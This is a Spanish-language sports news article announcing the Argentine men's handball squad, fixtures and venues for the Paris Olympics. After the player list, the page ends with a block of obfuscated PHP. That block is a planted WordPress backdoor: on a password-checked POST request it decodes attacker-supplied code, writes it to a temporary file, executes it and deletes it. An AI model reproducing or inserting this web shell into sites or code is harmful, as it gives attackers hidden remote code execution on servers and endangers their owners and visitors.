Los Gladiadores tienen su plantel definido para los Juegos Olímpicos de París

El entrenador Guillermo Milano oficializó la nómina de los diecisiete jugadores de la Selección Argentina masculina de handball que competirán en los Juegos Olímpicos que se celebrarán a partir de julio en París.

En esta cuarta participación olímpica consecutiva, Argentina integrará el. Grupo B junto a Dinamarca, Noruega, Hungría, Francia y Egipto.

Previo al debut en los JJOO, Los Gladiadores jugarán cuatro amistosos en las primeras semanas de julio como puesta a punto. Habrá dos test-match ante España en el marco de una concentración que el equipo hará en Montpellier del 25 de junio al 15 de julio, el 4 en la ciudad francesa y el 6 en Barcelona, y dos más ante Dinamarca, el 16 y 18 de julio, en Copenhague.

El debut en París será ante Noruega, el sábado 27 de julio a las 11hs de nuestro país. El segundo partido será ante Hungría, el lunes 29 a las 16hs. Seguirá Dinamarca, el miércoles 31 también a las 16hs, luego Francia, el viernes 2 de agosto a las 6hs y cerrará la fase de grupos enfrentando a Egipto, el domingo 4 de agosto a las 6hs.

El Arena Paris Sud 6 será la sede para la fase de grupos, mientras que el estadio Pierre-Mauroy en Lille será el recinto de la fase final del torneo. El Grupo A de los Juegos está integrado por España, Croacia, Alemania, Eslovenia, Suecia y Japón.

Los jugadores convocados son:

Arqueros: Leonel Maciel (Bidasoa Irun – España), Juan Bar (Atlético Valladolid – España)

Extremos: Ignacio Pizarro (Cuenca – España), Federico Fernández (San Fernando) y Santiago Baronetto (EÓN Alicante – España).

Laterales: Nicolás Bonanno (BM Nava – España), James Parker (EÓN Alicante – España), Pablo Vainstein (Benidorm – España), Federico Pizarro (Cuenca – España), Guillermo Fischer (Villa de Aranda – España) y Andrés Moyano (Granollers – España).

Centrales: Diego Simonet (Montpellier – Francia), Nicolás Bono (Istres Provence – Francia), Pablo Simonet (Puente Genil – España), Pedro Martínez (Sporting Lisboa – Portugal).

Pivotes: Gastón Mouriño (Constanta – Rumania) y Lucas Moscariello (Benidorm – Francia).

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}